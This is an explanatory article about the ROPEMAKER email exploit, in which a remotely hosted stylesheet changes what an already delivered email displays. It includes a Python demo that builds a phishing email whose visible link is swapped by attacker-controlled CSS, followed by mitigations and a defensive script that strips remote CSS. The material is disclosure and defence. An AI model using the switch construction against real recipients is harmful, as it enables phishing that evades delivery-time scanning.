A good number of people, inside and outside the infosec community, assume that once an email has arrived, was not flagged as spam or phishing, and has passed every email authentication filter, it is safe for good: a message containing a harmless URL cannot later become harmful, and what sits in the inbox is immune to future tampering and man-in-the-middle attacks.
A new email exploit, dubbed ROPEMAKER by Mimecast’s research team, turns that assumption on its head and undermines the security and non-repudiation of email, even for messages signed with S/MIME or PGP. Using ROPEMAKER, an attacker can change what an already delivered email displays, at will: swap a benign URL for a malicious one, turn plain text into a malicious link, or edit any text in the body, whenever they choose. None of this requires access to the inbox, and the signature still verifies, because the bytes of the stored message never change; what changes is the remotely hosted stylesheet the mail client applies when it renders the message.
A short overview of what a man-in-the-middle attack is: an attacker positioned between two users or systems can observe and intercept the messages passing between them, and can read, insert, and modify them. Over the years, man-in-the-middle (MITM) attacks have become an extremely successful threat vector. Exploiting them usually requires familiarity with various tools plus a network position, either physical access to the network or proximity to a wireless access point.
What makes ROPEMAKER different?
The origin of Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky (ROPEMAKER) lies at the intersection of email and web technologies, more specifically Cascading Style Sheets (CSS) used with HTML. While these web technologies have made email more visually attractive and dynamic than its purely text-based predecessor, they have also introduced an exploitable attack vector: an HTML email can reference a stylesheet hosted on a remote server, and a client that fetches that stylesheet applies whatever the server happens to serve at the moment the message is opened, not whatever it served when the message was scanned and delivered.
This remote control could let bad actors direct unwitting users to malicious websites, or cause other harmful consequences, using a technique that bypasses common security controls (which inspect the message once, at delivery, before the stylesheet has been changed) and can fool even the most security-savvy users, since the message they trust is the one they already checked. ROPEMAKER could be leveraged in ways limited only by the creativity of the threat actors, which experience tells us is often unlimited.
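To make the mechanism concrete, here is an added example (written for this page, not Mimecast’s code) of the simplest ROPEMAKER-style trick, the "switch": two links with identical visible text are embedded in the delivered HTML, and a stylesheet fetched from a host the attacker controls decides which one is displayed. The hostnames, element ids and both stylesheet versions are made up for the example, and the small `visible_links` function stands in for the mail client’s renderer; it only understands `#id { display: none }` rules, which is all the demonstration needs.

```python
"""ROPEMAKER-style 'switch' demonstration.

Added example, not Mimecast's code. The delivered message never changes;
only the stylesheet served from the (made-up) attacker host does.
"""
import re
from email.message import EmailMessage

# Hypothetical attacker-controlled stylesheet URL (constructed for this example).
REMOTE_CSS = "https://cdn.example.invalid/mail.css"


def build_switch_email() -> EmailMessage:
    """Build an HTML email carrying two links with the same visible text.
    Which one the user sees is decided by the remote stylesheet, not by
    anything in the message itself, so an S/MIME or PGP signature over the
    message still verifies after the 'switch'."""
    html = f"""<html><head>
<link rel="stylesheet" href="{REMOTE_CSS}">
</head><body>
<p>Your invoice is ready:</p>
<a id="good" href="https://billing.example.invalid/invoice">View invoice</a>
<a id="bad" href="https://billing-example.invalid/login">View invoice</a>
</body></html>"""
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Your invoice"
    msg.set_content("Your invoice is ready.")
    msg.add_alternative(html, subtype="html")
    return msg


# Two versions of the same remote stylesheet (constructed). Version 1 is served
# while the mail is delivered and scanned; the attacker then swaps in version 2.
CSS_AT_DELIVERY = "#bad { display: none; }"
CSS_AFTER_SWAP = "#good { display: none; }"


def visible_links(html: str, css: str) -> list[str]:
    """Toy model of a mail client's renderer: return the hrefs of <a> elements
    whose id is not hidden by a '#id { display: none }' rule in the stylesheet."""
    hidden = set(re.findall(r"#([\w-]+)\s*\{[^}]*display\s*:\s*none", css))
    links = re.findall(r'<a\s+id="([\w-]+)"\s+href="([^"]+)"', html)
    return [href for elem_id, href in links if elem_id not in hidden]


def html_part(msg: EmailMessage) -> str:
    """Extract the decoded text/html alternative from the message."""
    return msg.get_body(preferencelist=("html",)).get_content()


def demo() -> tuple[list[str], list[str]]:
    """Render the same delivered message against both stylesheet versions."""
    html = html_part(build_switch_email())
    return visible_links(html, CSS_AT_DELIVERY), visible_links(html, CSS_AFTER_SWAP)


if __name__ == "__main__":
    at_delivery, later = demo()
    print("links visible when scanned at delivery:", at_delivery)
    print("links visible when opened after the CSS swap:", later)
```

The point of the example is what `demo()` returns: the identical message body yields the legitimate link under the first stylesheet and the look-alike link under the second, and any gateway that rendered or scanned the mail at delivery saw only the first.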
[Video: Mimecast demo of ROPEMAKER and how it can be used]
[Image: email modified with ROPEMAKER]
How to prevent ROPEMAKER and other unknown email exploits
These are some preventive measures suggested by Mimecast that reduce the chance of falling victim to the ROPEMAKER exploit.
1. Prefer web-based email clients such as Gmail, Outlook.com and iCloud.com. Those web clients are not affected by ROPEMAKER-style CSS exploits, because they do not apply externally hosted stylesheets when rendering a message. Clients like the desktop and mobile versions of Microsoft Outlook, Apple Mail and Mozilla Thunderbird are all vulnerable.
2. Apple Mail users can minimize the risk by opening the Mail app, going to Preferences, selecting the Viewing menu and unchecking the box next to “Load remote content in messages.” Note that this fix works only on the desktop client and does not apply to the mobile client. A client that does not fetch remote content can only render what was actually delivered, which is exactly the property ROPEMAKER relies on breaking; the same setting also blocks tracking pixels.
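The mail-gateway counterpart of the “don’t load remote content” setting above, as an added example (not Mimecast’s or any vendor’s code): parse a message, find stylesheet references that point at an http(s) host, and rewrite the HTML part without them, so that whatever the remote host serves later cannot change how the message renders. The sample message and its hostnames are constructed for the example; a real deployment would also want to cover inline `style="...url(...)"` attributes and log the removed URLs for investigation.

```python
"""Strip remote stylesheet references from the HTML part of an email.

Added example, not vendor code. Gateway-side equivalent of a client that
refuses to load remote content: nothing an attacker controls is fetched
when the mail is rendered, so the message cannot change after delivery.
"""
import re
from email import message_from_bytes, policy

# Any <link> whose href points at an http(s) host. In email there is no
# legitimate reason to fetch a stylesheet from the network, so every such
# reference is treated as removable, not only rel="stylesheet".
LINK_RE = re.compile(
    r'<link\b[^>]*\bhref\s*=\s*["\']?(https?://[^"\'>\s]+)[^>]*>', re.I
)
# @import url("https://...") or @import "https://..." inside a <style> block.
IMPORT_RE = re.compile(
    r'@import\s+(?:url\()?["\']?(https?://[^"\')\s;]+)["\']?\)?\s*;?', re.I
)


def find_remote_css(html: str) -> list[str]:
    """Return every remote stylesheet URL referenced by the HTML."""
    return LINK_RE.findall(html) + IMPORT_RE.findall(html)


def strip_remote_css(html: str) -> str:
    """Remove remote <link> tags and @import rules from the HTML."""
    return IMPORT_RE.sub("", LINK_RE.sub("", html))


def sanitize_message(raw: bytes) -> tuple[bytes, list[str]]:
    """Parse a raw RFC 5322 message, rewrite each text/html part without
    remote CSS, and return (new_raw_message, urls_that_were_removed)."""
    msg = message_from_bytes(raw, policy=policy.default)
    removed: list[str] = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        urls = find_remote_css(html)
        if urls:
            removed.extend(urls)
            # set_content clears the old payload and Content-* headers and
            # re-encodes the rewritten HTML with a fresh transfer encoding.
            part.set_content(strip_remote_css(html), subtype="html")
    return msg.as_bytes(), removed


# Constructed sample message: one remote <link> and one @import, plus the
# legitimate link the user should keep seeing.
SAMPLE_EML = b"""From: billing@example.invalid
To: victim@example.invalid
Subject: Your invoice
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><head>
<link rel="stylesheet" href="https://cdn.example.invalid/mail.css">
<style>@import url("https://cdn.example.invalid/extra.css");</style>
</head><body>
<a id="good" href="https://billing.example.invalid/invoice">View</a>
</body></html>
"""


if __name__ == "__main__":
    cleaned, urls = sanitize_message(SAMPLE_EML)
    print("removed remote CSS references:", urls)
    print(cleaned.decode())
```

Run as a filter, the second element of the return value is what you would log or alert on: a message that references remote CSS at all is unusual enough in most environments to deserve a look, whether or not it is ever switched.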